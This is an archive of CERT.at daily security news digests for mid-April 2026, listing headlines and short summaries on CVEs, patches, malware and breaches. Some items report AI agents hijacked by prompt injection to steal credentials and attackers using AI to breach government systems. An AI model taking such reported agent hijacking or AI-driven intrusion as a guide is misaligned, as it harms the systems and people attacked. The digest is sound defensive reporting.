Daily April 2026

daily@lists.cert.at

1 participants
21 discussions

Tageszusammenfassung - 16.04.2026
by Daily end-of-shift report 16 Apr '26

16 Apr '26

===================== = End-of-Day report = ===================== Timeframe: Mittwoch 15-04-2026 18:00 − Donnerstag 16-04-2026 18:00 Handler: Felician Fuchs Co-Handler: Guenes Holler ===================== = News = ===================== ∗∗∗ NIST Updates NVD Operations to Address Record CVE Growth ∗∗∗ --------------------------------------------- NIST is changing the way it handles cybersecurity vulnerabilities and exposures, or CVEs, listed in its National Vulnerability Database (NVD). In the past, NIST’s NVD program aimed to analyze all CVEs to add details — such as severity scores and product lists — that help cybersecurity professionals prioritize and mitigate vulnerabilities. Going forward, NIST will add details, or “enrich,” those CVEs that meet certain criteria, which are explained below. --------------------------------------------- https://www.nist.gov/news-events/news/2026/04/nist-updates-nvd-operations-a… ∗∗∗ New ATHR vishing platform uses AI voice agents for automated attacks ∗∗∗ --------------------------------------------- A new cybercrime platform called ATHR can harvest credentials via fully automated voice phishing attacks that use both human operators and AI agents for the social engineering phase. --------------------------------------------- https://www.bleepingcomputer.com/news/security/new-athr-vishing-platform-us… ∗∗∗ Nach Bluehammer: Frustrierter Forscher leakt weiteren Windows-Exploit ∗∗∗ --------------------------------------------- Angreifer können mit dem Exploit auf Windows -Systemen aufgrund eines Fehlers im Defender Systemrechte erlangen. Ein Patch ist noch nicht in Sicht. --------------------------------------------- https://www.golem.de/news/nach-bluehammer-frustrierter-forscher-leakt-weite… ∗∗∗ Kognitive Schuld: KI-generierte Software erfordert traditionelle Praktiken ∗∗∗ --------------------------------------------- Damit Entwickler ihren mithilfe von KI generierten Code weiterhin verstehen können, wird die Besinnung auf traditionelle Praktiken empfohlen. --------------------------------------------- https://www.golem.de/news/kognitive-schuld-ki-generierte-software-erfordert… ∗∗∗ [Guest Diary] Compromised DVRs and Finding Them in the Wild, (Thu, Apr 16th) ∗∗∗ --------------------------------------------- Security cameras are great at monitoring physical doors, but terrible at locking their own digital ones. Across the internet, thousands of unpatched DVRs sit publicly exposed, many guarded only by the default vendor passwords they shipped with. For threat actors, these are low-hanging fruit. This write-up details a recent two-second Telnet capture, providing a mechanical breakdown of how quickly an exposed camera system goes from online to fully compromised by bad actors. --------------------------------------------- https://isc.sans.edu/diary/rss/32886 ∗∗∗ Anthropics Project Glasswing CVE tally is still anyones guess ∗∗∗ --------------------------------------------- Like the majority of the companies participating, it remains a mystery Last week, Anthropic surprised the world by declaring that its latest model, Mythos, is so good at finding vulns that it would create chaos if released. Now, under the title of Project Glasswing, over 50 selected companies and orgs are allowed to test the hyped up LLM to find security holes in their own products. But just how many problems have they really discovered? --------------------------------------------- https://go.theregister.com/feed/www.theregister.com/2026/04/15/project_glas… ∗∗∗ A fake Slack download is giving attackers a hidden desktop on your machine ∗∗∗ --------------------------------------------- This trojanized Slack installer looks normal, but quietly gives attackers an invisible desktop to access your accounts and data. We take a deep dive into the attack. --------------------------------------------- https://www.malwarebytes.com/blog/threat-intel/2026/04/a-fake-slack-downloa… ∗∗∗ Teen arrested in Northern Ireland over cyberattack on school network ∗∗∗ --------------------------------------------- A 16-year-old boy has been arrested in Northern Ireland after a cyberattack disrupted access to educational systems used by potentially hundreds of thousands of students. --------------------------------------------- https://therecord.media/northern-ireland-cyberattack-arrest ∗∗∗ PowMix botnet targets Czech workforce ∗∗∗ --------------------------------------------- Cisco Talos discovered an ongoing malicious campaign, operating since at least December 2025, affecting a broader workforce in the Czech Republic with a previously undocumented botnet we call “PowMix.” --------------------------------------------- https://blog.talosintelligence.com/powmix-botnet-targets-czech-workforce/ ∗∗∗ Researchers Say Fiverr Left User Files Open to Google Search ∗∗∗ --------------------------------------------- Private Fiverr user documents, including tax records and IDs, were reportedly found in Google search results due to a storage configuration issue. Read more about the findings and the company’s response to the data exposure. --------------------------------------------- https://hackread.com/fiverr-left-user-files-open-to-google-search/ ∗∗∗ The German Cyber Criminal Überfall: Shifts in Europes Data Leak Landscape ∗∗∗ --------------------------------------------- Germany has reclaimed its position as a primary focus for cyber extortion in Europe. While data leak site (DLS) posts rose almost 50% globally in 2025, Google Threat Intelligence (GTI) data shows that the surge is hitting German infrastructure harder and faster than its regional neighbors, marking a significant return to the high-pressure levels previously observed in the country during 2022 and 2023. --------------------------------------------- https://cloud.google.com/blog/topics/threat-intelligence/europe-data-leak-l… ∗∗∗ „Power Off“: BKA geht gegen DDoS-Angebote vor ∗∗∗ --------------------------------------------- Bundeskriminalamt und Generalstaatsanwaltschaft Frankfurt sind mit internationalen Partnern gegen sogenannte Stresserdienste vorgegangen. Es gab Festnahmen. --------------------------------------------- https://heise.de/-11261177 ∗∗∗ Europas Regierungen setzen auf eigene Messenger-Lösungen ∗∗∗ --------------------------------------------- Von Berlin bis Brüssel: Regierungen setzen verstärkt auf eigene Messenger, um Abhängigkeiten von US-Plattformen und Sicherheitsrisiken zu reduzieren. --------------------------------------------- https://heise.de/-11261147 ===================== = Vulnerabilities = ===================== ∗∗∗ Cisco: Kritische Codeschmuggel-Lücken in ISE und mehr geschlossen ∗∗∗ --------------------------------------------- In Ciscos Identity Services Engine sowie Webex klaffen kritische Sicherheitslücken. Insgesamt stopfen die Entwickler 10 Sicherheitslecks. --------------------------------------------- https://www.heise.de/news/Cisco-Kritische-Codeschmuggel-Luecken-in-ISE-und-… ∗∗∗ Anonymisierendes Linux: Notfallupdate auf Tails 7.6.2 schließt Flatpak-Lücke ∗∗∗ --------------------------------------------- Eine Sicherheitslücke in Flatpak ist Auslöser für ein Notfallupdate für die Linux-Distribution Tails, die anonymes Surfen ermöglicht. --------------------------------------------- https://www.heise.de/news/Anonymisierendes-Linux-Notfallupdate-auf-Tails-7-… ∗∗∗ Gimp: Version 3.2.2 schließt Codeschmuggel-Lücke mit GIFs ∗∗∗ --------------------------------------------- Sicherheitslücken in Gimp erlauben das Einschleusen von Schadcode mit manipulierten Dateien wie GIFs. Version 3.2.2 schließt sie. --------------------------------------------- https://heise.de/-11260619 ∗∗∗ LWN: Security updates for Thursday ∗∗∗ --------------------------------------------- https://lwn.net/Articles/1067993/ ∗∗∗ Drupal core - Moderately critical - Gadget Chain - SA-CORE-2026-002 ∗∗∗ --------------------------------------------- https://www.drupal.org/sa-core-2026-002 ∗∗∗ Drupal core - Critical - Cross-site scripting - SA-CORE-2026-001 ∗∗∗ --------------------------------------------- https://www.drupal.org/sa-core-2026-001 ∗∗∗ Drupal core - Moderately critical - Cross-site scripting - SA-CORE-2026-003 ∗∗∗ --------------------------------------------- https://www.drupal.org/sa-core-2026-003 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/mailman3/postorius/lists/daily.lists.cert.at/

1 0

Tageszusammenfassung - 15.04.2026
by Daily end-of-shift report 15 Apr '26

15 Apr '26

===================== = End-of-Day report = ===================== Timeframe: Dienstag 14-04-2026 18:00 − Mittwoch 15-04-2026 18:00 Handler: Felician Fuchs Co-Handler: Alexander Riepl ===================== = News = ===================== ∗∗∗ Microsoft April 2026 Patch Tuesday fixes 167 flaws, 2 zero-days ∗∗∗ --------------------------------------------- Today is Microsofts April 2026 Patch Tuesday with security updates for 167 flaws, including 2 zero-day vulnerabilities. --------------------------------------------- https://www.bleepingcomputer.com/news/microsoft/microsoft-april-2026-patch-… ∗∗∗ Over 100 Chrome extensions in Web Store target users accounts and data ∗∗∗ --------------------------------------------- More than 100 malicious extensions in the official Chrome Web Store are attempting to steal Google OAuth2 Bearer tokens, deploy backdoors, and carry out ad fraud. --------------------------------------------- https://www.bleepingcomputer.com/news/security/over-100-chrome-extensions-i… ∗∗∗ Microsoft: April updates trigger BitLocker key prompts on some servers ∗∗∗ --------------------------------------------- Microsoft confirmed on Tuesday that some Windows Server 2025 devices will boot into BitLocker recovery after installing the April 2026 KB5082063 Windows security update. --------------------------------------------- https://www.bleepingcomputer.com/news/microsoft/microsoft-some-windows-serv… ∗∗∗ New PHP Composer Flaws Enable Arbitrary Command Execution — Patches Released ∗∗∗ --------------------------------------------- Two high-severity security vulnerabilities have been disclosed in Composer, a package manager for PHP, that, if successfully exploited, could result in arbitrary command execution.The vulnerabilities have been described as command .. --------------------------------------------- https://thehackernews.com/2026/04/new-php-composer-flaws-enable-arbitrary.h… ∗∗∗ Actively Exploited nginx-ui Flaw (CVE-2026-33032) Enables Full Nginx Server Takeover ∗∗∗ --------------------------------------------- A recently disclosed critical security flaw impacting nginx-ui, an open-source, web-based Nginx management tool, has come under active exploitation in the wild.The vulnerability in question is CVE-2026-33032 (CVSS score: 9.8), an .. --------------------------------------------- https://thehackernews.com/2026/04/critical-nginx-ui-vulnerability-cve.html ∗∗∗ Agents hooked into GitHub can steal creds – but Anthropic, Google, and Microsoft havent warned users ∗∗∗ --------------------------------------------- Researchers who found the flaws scored beer money bounties and warn the problem is probably pervasive Exclusive Security researchers hijacked three popular AI agents that integrate with GitHub Actions by using a new type of prompt injection attack to steal API keys and access tokens, and the vendors who run agents didn’t disclose the problem. --------------------------------------------- https://www.theregister.com/2026/04/15/claude_gemini_copilot_agents_hijacke… ∗∗∗ UK told its Big Tech habit is now a national security risk ∗∗∗ --------------------------------------------- Open Rights Group says years of reliance on US giants have left Britain exposed Britain has spent years wiring its public sector into US Big Tech, and a new report says that dependence could quickly become a national security headache. --------------------------------------------- https://www.theregister.com/2026/04/15/uk_big_tech_dependence/ ∗∗∗ Ancient Excel bug comes out of retirement for active attacks ∗∗∗ --------------------------------------------- Vuln old enough to drive lands on CISAs exploited list While Microsoft was rolling out its bumper Patch Tuesday updates this week, US cybersecurity agency CISA was readying an alert about a 17-year-old critical Excel flaw now under exploit. --------------------------------------------- https://www.theregister.com/2026/04/15/excel_exploit/ ∗∗∗ Fortinet stopft 18 Sicherheitslecks ∗∗∗ --------------------------------------------- Insgesamt 18 Sicherheitsnotizen hat Fortinet in der Nacht zum Mittwoch veröffentlicht. Sie behandeln teils kritische Lücken. --------------------------------------------- https://www.heise.de/news/Fortinet-stopft-18-Sicherheitslecks-11257883.html ∗∗∗ Booking.com: Unbefugte Zugriffe von Kriminellen entdeckt ∗∗∗ --------------------------------------------- Booking.com gibt unbefugte Fremdzugriffe auf Buchungsinformationen zu. Betroffene Kunden werden informiert, ihre PINs aktualisiert. --------------------------------------------- https://www.heise.de/news/Booking-com-Unbefugte-Zugriffe-von-Kriminellen-en… ∗∗∗ Microsoft Office 2021: Support endet am 13. Oktober 2026 ∗∗∗ --------------------------------------------- Microsoft erinnert an das Support-Ende für Office 2021 am 13. Oktober 2026. Es gibt keine erweiterten Sicherheitsupdates (ESU). --------------------------------------------- https://www.heise.de/news/Microsoft-Office-2021-Support-endet-am-13-Oktober… ∗∗∗ April Patch Tuesday fixes two zero-days, including one under active attack ∗∗∗ --------------------------------------------- This month’s Patch Tuesday addresses 167 vulnerabilities, including two zero-days that could lead to system compromise, data exposure, and privilege escalation. --------------------------------------------- https://www.malwarebytes.com/blog/news/2026/04/april-patch-tuesday-fixes-tw… ∗∗∗ Sweden says pro-Russian hackers attempted to breach thermal power plant ∗∗∗ --------------------------------------------- A suspected pro-Russian hacker group attempted to disrupt operations at a thermal power plant in western Sweden last year, a Swedish defense official said. --------------------------------------------- https://therecord.media/sweden-hackers-russia-power-plant ∗∗∗ The n8n n8mare: How threat actors are misusing AI workflow automation ∗∗∗ --------------------------------------------- Cisco Talos research has uncovered agentic AI workflow automation platform abuse in emails. Recently, we identified an increase in the number of emails that abuse n8n, one of these platforms, from as early as October 2025 through March 2026. --------------------------------------------- https://blog.talosintelligence.com/the-n8n-n8mare/ ∗∗∗ wolfSSL Vulnerability Hits IoT, Routers and Military Systems, Update to 5.9.1 Now ∗∗∗ --------------------------------------------- Critical wolfSSL flaw CVE-2026-5194 allows digital ID forgery across billions of devices, update to version 5.9.1 to fix the issue and reduce risk. --------------------------------------------- https://hackread.com/wolfssl-vulnerability-iot-routers-military-systems/ ∗∗∗ Adobe-Patchday: Kritische Schadcode-Lücken bedrohen Photoshop & Co. ∗∗∗ --------------------------------------------- Wichtige Sicherheitsupdates schließen Schwachstellen in Anwendungen von Adobe. Weil viele Lücken kritisch sind, sollten Admins zeitnah handeln. --------------------------------------------- https://heise.de/-11257985 ∗∗∗ How to Harden GitHub Actions: An Updated Guide ∗∗∗ --------------------------------------------- Build resilient GitHub Actions workflows with lessons from recent attacks like TeamPCP and Axios. --------------------------------------------- https://www.wiz.io/blog/github-actions-security-guide ===================== = Vulnerabilities = ===================== ∗∗∗ Zugänglicher Privater Schlüssel eines X.509 Zertifikats in SAP HANA Cockpit & SAP HANA Database Explorer ∗∗∗ --------------------------------------------- https://sec-consult.com/de/vulnerability-lab/advisory/zugaenglicher-private… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/mailman3/postorius/lists/daily.lists.cert.at/

1 0

Tageszusammenfassung - 14.04.2026
by Daily end-of-shift report 14 Apr '26

14 Apr '26

===================== = End-of-Day report = ===================== Timeframe: Montag 13-04-2026 18:00 − Dienstag 14-04-2026 18:00 Handler: Felician Fuchs Co-Handler: Michael Schlagenhaufer ===================== = News = ===================== ∗∗∗ Große Gym-Kette: Cyberangriff auf Basic-Fit betrifft eine Million Mitglieder ∗∗∗ --------------------------------------------- Ein unbekannter Angreifer ist in die IT von Basic-Fit eingedrungen und hat zahlreiche persönliche Daten von Mitgliedern aus ganz Europa abgerufen. --------------------------------------------- https://www.golem.de/news/grosse-gym-kette-cyberangriff-auf-basic-fit-betri… ∗∗∗ ASFINAG-Phishing: Über eine Fake-Mail an die Kreditkartendaten ∗∗∗ --------------------------------------------- Erwischt beim Fahren ohne Vignette? Mit der Zahlung einer Ersatzmaut in Höhe von 12,36 Euro ist die Angelegenheit aus der Welt geschafft? Was auf den ersten Blick aussieht wie eine echte Benachrichtigung der ASFINAG, ist in Wahrheit eine neue Phishing-Welle. --------------------------------------------- https://www.watchlist-internet.at/news/asfinag-phishing-mail-kreditkartenda… ∗∗∗ The AI-Assisted Breach of Mexicos Government Infrastructure ∗∗∗ --------------------------------------------- In February, we published our initial findings on the AI-assisted breach of Mexico's government infrastructure, warning of the elevated risk that AI-powered threat actors now pose. A single operator used AI to breach nine Mexican government organizations and exfiltrate hundreds of millions of citizen records. Today, we release the full technical report. --------------------------------------------- https://gambit.security/blog-post/a-single-operator-two-ai-platforms-nine-g… ∗∗∗ The “AI Vulnerability Storm”: Building a “Mythos-ready” Security Program ∗∗∗ --------------------------------------------- A briefing for security leaders on how AI-driven vulnerability discovery is reshaping the defender timeline, the operating model of vulnerability management, and the minimum actions required now. --------------------------------------------- https://labs.cloudsecurityalliance.org/mythos-ciso/ ∗∗∗ 108 Chrome Extensions Linked to Data Exfiltration and Session Theft via Shared C2 Infrastructure ∗∗∗ --------------------------------------------- Sockets Threat Research Team identified 108 malicious Chrome extensions operating as a coordinated campaign under a shared C2 infrastructure at cloudapi[.]stream. The extensions are published under five distinct publisher identities (Yana Project, GameGen, SideGames, Rodeo Games, and InterAlt) and collectively account for approximately 20k Chrome Web Store installs. All 108 route stolen credentials, user identities, and browsing data to servers controlled by the same operator. --------------------------------------------- https://socket.dev/blog/108-chrome-ext-linked-to-data-exfil-session-theft-s… ===================== = Vulnerabilities = ===================== ∗∗∗ Critical flaw in wolfSSL library enables forged certificate use ∗∗∗ --------------------------------------------- A critical vulnerability in the wolfSSL SSL/TLS library can weaken security via improper verification of the hash algorithm or its size when checking Elliptic Curve Digital Signature Algorithm (ECDSA) signatures. --------------------------------------------- https://www.bleepingcomputer.com/news/security/critical-flaw-in-wolfssl-lib… ∗∗∗ SAP-Patchday: Eine kritische SQL-Injection-Lücke – und 18 weitere ∗∗∗ --------------------------------------------- Am April-Patchday behandelt SAP Schwachstellen mit 19 Sicherheitsnotizen. Eine kritische erlaubt das Einschleusen von SQL-Befehlen. --------------------------------------------- https://www.heise.de/news/SAP-Patchday-Eine-kritische-SQL-Injection-Luecke-… ∗∗∗ Attackers Actively Exploiting Critical Vulnerability in Kali Forms Plugin ∗∗∗ --------------------------------------------- Considering this vulnerability is under active attack, we urge users to ensure their sites are updated with the latest patched version of Kali Forms, version 2.4.10 at the time of this writing, as soon as possible. --------------------------------------------- https://www.wordfence.com/blog/2026/04/attackers-actively-exploiting-critic… ∗∗∗ Fortninet: OS Command Injection through API endpoint ∗∗∗ --------------------------------------------- CVSSv3 Score: 9.1 An Improper Neutralization of Special Elements used in an OS Command (OS command injection) vulnerability [CWE-78] in FortiSandbox may allow an unauthenticated attacker to execute unauthorized code or commands via crafted HTTP requests. --------------------------------------------- https://fortiguard.fortinet.com/psirt/FG-IR-26-100 ∗∗∗ Fortninet: SQL Injection via API ∗∗∗ --------------------------------------------- CVSSv3 Score: 7.9 An improper neutralization of special elements used in an SQL command (SQL Injection) vulnerability [CWE-89] in FortiDDoS-F may allow an authenticated attacker to run arbitrary SQL queries on the database by sending crafted HTTP requests. --------------------------------------------- https://fortiguard.fortinet.com/psirt/FG-IR-26-119 ∗∗∗ Fortninet: Unauthenticated Authentication bypass and Privilege escalation in FortiSandbox ∗∗∗ --------------------------------------------- CVSSv3 Score: 9.1 A Path Traversal vulnerability [CWE-24] in FortiSandbox JRPC API may allow an unauthenticated attacker to bypass authentication via specially crafted HTTP requests. --------------------------------------------- https://fortiguard.fortinet.com/psirt/FG-IR-26-112 ∗∗∗ April 2026 Security Update ∗∗∗ --------------------------------------------- Ivanti releases standard security patches on the second Tuesday of every month. Our vulnerability management program is central to our commitment to maintaining secure products. [..] To that end, today Ivanti is disclosing vulnerabilities in Ivanti Neurons for ITSM (on-premises and cloud). --------------------------------------------- https://www.ivanti.com/blog/april-2026-security-update ∗∗∗ Someone Bought 30 WordPress Plugins and Planted a Backdoor in All of Them ∗∗∗ --------------------------------------------- Last week, I wrote about catching a supply chain attack on a WordPress plugin called Widget Logic. A trusted name, acquired by a new owner, turned into something malicious. It happened again. This time at a much larger scale. --------------------------------------------- https://anchor.host/someone-bought-30-wordpress-plugins-and-planted-a-backd… ∗∗∗ LWN Security updates for Tuesday ∗∗∗ --------------------------------------------- https://lwn.net/Articles/1067595/ -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/mailman3/postorius/lists/daily.lists.cert.at/

1 0

Tageszusammenfassung - 13.04.2026
by Daily end-of-shift report 13 Apr '26

13 Apr '26

===================== = End-of-Day report = ===================== Timeframe: Freitag 10-04-2026 18:00 − Montag 13-04-2026 18:00 Handler: Michael Schlagenhaufer Co-Handler: Alexander Riepl ===================== = News = ===================== ∗∗∗ Critical Marimo pre-auth RCE flaw now under active exploitation ∗∗∗ --------------------------------------------- A critical pre-authentication remote code execution (RCE) vulnerability in Marimo is now under active exploitation, leveraged for credential theft. --------------------------------------------- https://www.bleepingcomputer.com/news/security/critical-marimo-pre-auth-rce… ∗∗∗ Datenpanne: Angreifer missbrauchen frische Buchungsdaten von Booking.com ∗∗∗ --------------------------------------------- Bei der Reisebuchungsplattform Booking.com hat es offenbar einen Sicherheitsvorfall gegeben. Der Plattformbetreiber informiert seine Nutzer derzeit per E-Mail über einen möglichen Missbrauch ihrer Buchungsdaten. Es drohen Kontaktaufnahmeversuche sowie Zahlungsaufforderungen durch die Angreifer. --------------------------------------------- https://www.golem.de/news/datenpanne-angreifer-missbrauchen-frische-buchung… ∗∗∗ Hungarian government creds left in the safe hands of FrankLampard ∗∗∗ --------------------------------------------- Hungary's government has discovered the hard way that the biggest threat to national security might just be its own password choices. An investigation by Bellingcat has uncovered close to 800 Hungarian government email and password pairings circulating in breach dumps, cutting across nearly every major ministry, from defense and foreign affairs to finance. [..] According to the analysis, officials were using their government email addresses to sign up for all sorts of third-party services, then reusing the same passwords across them. Once those sites were breached, the credentials ended up in the usual places. --------------------------------------------- https://go.theregister.com/feed/www.theregister.com/2026/04/11/hungary_gove… ∗∗∗ Supply-Chain Attacks, TP-Link devices & a pair of socks ∗∗∗ --------------------------------------------- March 2026 was intense for cybersecurity teams across the globe. Within a three-week window, the industry observed three application-security companies compromised in supply-chain attacks using the same vector: poisoned GitHub Actions. [...] During our investigation we discovered connections between the Xygeni compromise and a separate campaign targeting IoT devices, connections that had previously gone unreported. --------------------------------------------- https://ctrlaltintel.com/research/ProxyPCP/ ∗∗∗ Rockstar bestätigt Cyberangriff und Datendiebstahl ∗∗∗ --------------------------------------------- Die bekannte Cybercrime-Gruppe Shiny Hunters erpresst Rockstar Games auf ihrer Webseite. Rockstar bestätigt einen Cybervorfall. [..] Die Cybergang ShinyHunters erklärte auf ihrer Webseite, sie habe Rockstars Snowflake-Instanzen mithilfe des Drittanbieter-Tools AnoDot kompromittiert. [..] Und der Vorfall bei Rockstar Games ist möglicherweise die Folge eines Cyberangriffs auf AnoDot, ebenfalls ausgeführt von ShinyHunters. --------------------------------------------- https://www.heise.de/news/Rockstar-bestaetigt-Cyberangriff-und-Datendiebsta… ∗∗∗ Finanzamt fordert Datenupdate? Achtung Phishingfalle! ∗∗∗ --------------------------------------------- Frühlingsbeginn heißt für viele: Zeit für den Steuerausgleich. Doch damit startet leider auch die Hochsaison für Kriminelle, die im Namen des Finanzministeriums Phishing-Nachrichten verbreiten. --------------------------------------------- https://www.watchlist-internet.at/news/finanzamt-fordert-datenupdate/ ∗∗∗ GitHub Copilot-Schwachstelle CVE-2025-59145 erlaubt Datenextraktion ∗∗∗ --------------------------------------------- Der in der Plattform GitHub von Microsoft integrierte Copilot sorgt mal wieder für Ärger. Es gab eine Schwachstelle CVE-2025-59145, die mit einem CVSS Score von 9.6 schon heftig ist. Über die Schwachstelle können Angreifer sensitive Daten von GitHub-Projekten extrahieren. Der Quellcode, API-Keys, Cloud-Geheimnisse, alles was in privaten GitHub-Repositories zu finden ist, konnte abgezogen werden. Die CamoLeak getaufte Schwachstelle CVE-2025-59145 wurde laut BlackFog im Oktober 2025 öffentlich bekannt. --------------------------------------------- https://borncity.com/blog/2026/04/11/github-copilot-schwachstelle-cve-2025-… ∗∗∗ Just 21 IP Addresses Are Now Behind Nearly Half of All RDP Scanning on the Internet ∗∗∗ --------------------------------------------- GreyNoise uncovers a concentrated RDP scanning campaign, revealing infrastructure patterns, rapid traffic shifts that impact detection, and recommendations for defenders. --------------------------------------------- https://www.greynoise.io/blog/ip-addresses-behind-nearly-half-rdp-internet-… ∗∗∗ „ClickFix“-Angriffe auf macOS jetzt auch via Script Editor ∗∗∗ --------------------------------------------- Wie Jamf Threat Labs in einer Analyse schreibt, locken die Angreifer ihre Opfer auf eine gefälschte Apple-Webseite, die vorgibt, dabei zu helfen, Speicherplatz auf dem Mac freizugeben. [..] Interessant dabei ist, dass die Installationskette dabei den Terminal-Paste-Schutz von macOS 26.4 umgeht. Apple hatte diese Schutzfunktion eingeführt, um Nutzer vor ClickFix-Angriffen zu warnen, wenn sie manipulierte Befehle ins Terminal einfügen, wobei das auch nicht immer funktioniert. Durch den Wechsel zu Script Editor wird dieser Mechanismus laut Jamf augenscheinlich ausgehebelt. --------------------------------------------- https://heise.de/-11251412 ∗∗∗ Inside Predator’s kernel engine ∗∗∗ --------------------------------------------- In our previous research, we documented how Predator spyware evades iOS anti-analysis checks and defeats iOS recording indicators. Those posts revealed what Predator does — but not how it achieves the deep system access required to do it. This post answers that question. --------------------------------------------- https://www.jamf.com/blog/predator-spyware-ios-kernel-exploitation-engine/ ===================== = Vulnerabilities = ===================== ∗∗∗ Schwerwiegende Sicherheitslücke in Adobe Reader - Updates jetzt verfügbar ∗∗∗ --------------------------------------------- Update, 13.04.2026: Adobe hat inzwischen ein Sicherheitsupdate veröffentlicht welches das Problem behebt. Administrator:innen sind dringend angehalten dieses schnellstmöglich einzuspielen. --------------------------------------------- https://www.cert.at/de/aktuelles/2026/4/schwerwiegende-sicherheitslucke-in-… ∗∗∗ SSL-Konfigurationsfehler gefährdet VMware Tanzu Spring Cloud Gateway ∗∗∗ --------------------------------------------- Die Entwickler geben an, die Schwachstelle (CVE-2026-22750 „hoch“) in Spring Cloud Gateway 4.2.1 (Enterprise Support Only) geschlossen zu haben. Bislang gibt es noch keine Hinweise auf Attacken. --------------------------------------------- https://www.heise.de/news/SSL-Konfigurationsfehler-gefaehrdet-VMware-Tanzu-… ∗∗∗ LWN: Security updates for Monday ∗∗∗ --------------------------------------------- https://lwn.net/Articles/1067436/ ∗∗∗ Kubernetes: CVE-2026-3865 ∗∗∗ --------------------------------------------- https://github.com/kubernetes/kubernetes/issues/138319 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/mailman3/postorius/lists/daily.lists.cert.at/

1 0

Tageszusammenfassung - 10.04.2026
by Daily end-of-shift report 10 Apr '26

10 Apr '26

===================== = End-of-Day report = ===================== Timeframe: Donnerstag 09-04-2026 18:00 − Freitag 10-04-2026 18:00 Handler: Michael Schlagenhaufer Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Schwerwiegende Sicherheitslücke in Adobe Reader - aktiv ausgenutzt ∗∗∗ --------------------------------------------- Ein Sicherheitsforscher hat eine schwerwiegende Lücke in Adobe Reader entdeckt für die bisher kein Update zur Verfügung steht. Um ein verwundbares System zu kompromittieren reicht es bereits aus, dass Nutzer:innen ein speziell präpariertes PDF-Dokument öffnen, eine weitere Interaktion ist nicht notwendig. Die Schwachstelle wird bereits seit mindestens November 2025 ausgenutzt. Ein erstes PDF-Dokument welches die Sicherheitslücke ausnutzt tauchte am 28. November 2025 auf VirusTotal auf. --------------------------------------------- https://www.cert.at/de/aktuelles/2026/4/schwerwiegende-sicherheitslucke-in-… ∗∗∗ Malware: Website, die CPUID, HWMonitor, CPU-Z etc. hostet, gehackt ∗∗∗ --------------------------------------------- Die Webseite, auf denen diese Tools gehostet und zum Download angeboten wurden, ist mutmaßlich einem Hack zum Opfer gefallen. Es wurde/wird in Folge dieses Hacks Malware beim Download vom Webserver bereitgestellt. Wer also kürzlich Tools wie CPUID, HWMonitor, CPU-Z etc. aus dem Internet von der Seite herunter geladen hat, könnte Malware auf dem Windows-System haben. --------------------------------------------- https://borncity.com/blog/2026/04/10/malware-website-die-cpuid-hwmonitor-cp… ∗∗∗ Smart Slider updates hijacked to push malicious WordPress, Joomla versions ∗∗∗ --------------------------------------------- Hackers hijacked the update system for the Smart Slider 3 Pro plugin for WordPress and Joomla, and pushed a malicious version with multiple backdoors. [..] The developer says that only the Pro version 3.5.1.35 of the plugin is affected and recommends switching immediately to the latest version, currently 3.5.1.36, or 3.5.1.34 and earlier. --------------------------------------------- https://www.bleepingcomputer.com/news/security/smart-slider-updates-hijacke… ∗∗∗ Project Glasswing and open source software: The good, the bad, and the ugly ∗∗∗ --------------------------------------------- Anthropic describes Project Glasswing as a coalition of tech giants committing $100 million in AI resources to hunt down and fix long-hidden vulnerabilities in critical open source software that it's finding with its new Mythos AI program. Or as The Reg put it, "an AI model that can generate zero-day vulnerabilities." Oh boy! Just what we needed. Not just AI security bug slop, but automated, dedicated AI security bug slop! --------------------------------------------- https://go.theregister.com/feed/www.theregister.com/2026/04/10/project_glas… ∗∗∗ Anthropic-KI Mythos: Dringende Warnung an US-Banken, BSI erwartet Umwälzungen ∗∗∗ --------------------------------------------- US-Finanzminister Scott Bessent und der US-Notenbankchef Jerome Powell haben die Chefs der wichtigsten US-Banken am Dienstag zu einem ungewöhnlich dringenden Treffen zusammengerufen, um vor den Gefahren von Anthropics neuem KI-Modell Claude Mythos Preview zu warnen. Das berichtet Bloomberg unter Berufung auf eingeweihte Personen. Das kurzfristig anberaumte Treffen sei ein Zeichen dafür, dass US-Aufsichtsbehörden die Möglichkeit einer neuen Art von Cyberattacken zu den größten Risiken für die Finanzindustrie zählen, fasst die Finanznachrichtenplattform zusammen. --------------------------------------------- https://www.heise.de/news/Anthropic-KI-Mythos-Dringende-Warnung-an-US-Banke… ∗∗∗ Frankreichs Plan: Weg von Windows, hin zu Linux ∗∗∗ --------------------------------------------- Frankreichs Verwaltung soll weg von Windows und US-Tools: Die Regierung legt einen konkreten Fahrplan für digitale Souveränität vor. --------------------------------------------- https://heise.de/-11251566 ∗∗∗ 99 Prozent wollen digitale Unabhängigkeit – 6 Prozent nutzen KI aus EU ∗∗∗ --------------------------------------------- Fast alle Deutschen wollen digitale Unabhängigkeit – doch nur wenige nutzen europäische Alternativen. Eine Bitkom-Umfrage zeigt die Lücke. --------------------------------------------- https://heise.de/-11252308 ∗∗∗ Google Chrome adds infostealer protection against session cookie theft ∗∗∗ --------------------------------------------- Google has rolled out Device Bound Session Credentials (DBSC) protection in Chrome 146 for Windows, designed to block info-stealing malware from harvesting session cookies. --------------------------------------------- https://www.bleepingcomputer.com/news/security/google-chrome-adds-infosteal… ∗∗∗ Mikrofon nicht nötig: Neue Spionagetechnik missbraucht Glasfaserkabel als Wanze ∗∗∗ --------------------------------------------- Der Angriff basiert auf dem Umstand, dass auf Glasfaserleitungen einwirkende Schallwellen mikroskopisch kleine Verformungen verursachen. [..] Eine der Stärken einer Glasfaserleitung ist, dass sie im Vergleich zur klassischen Kupferleitung weniger anfällig für elektromagnetische Störungen ist. --------------------------------------------- https://www.golem.de/news/mikrofon-nicht-noetig-neue-spionagetechnik-missbr… ∗∗∗ Several dozen high-value corporations hit by new extortion crew in helpdesk phishing spree ∗∗∗ --------------------------------------------- A new extortion crew has targeted “several dozen high-value” corporations through phishing and helpdesk social-engineering, according to Google. [..] "The campaign relies on social engineering via live chat to direct employees to malicious, spoofed Okta login pages," Larsen said. --------------------------------------------- https://go.theregister.com/feed/www.theregister.com/2026/04/09/several_doze… ∗∗∗ APT28 exploit routers to enable DNS hijacking operations ∗∗∗ --------------------------------------------- The UK National Cyber Security Centre (NCSC) is providing details of tactics, techniques and procedures (TTPs) associated with APT28’s exploitation of routers to enable DNS hijacking operations. --------------------------------------------- https://www.ncsc.gov.uk/news/apt28-exploit-routers-to-enable-dns-hijacking-… ∗∗∗ 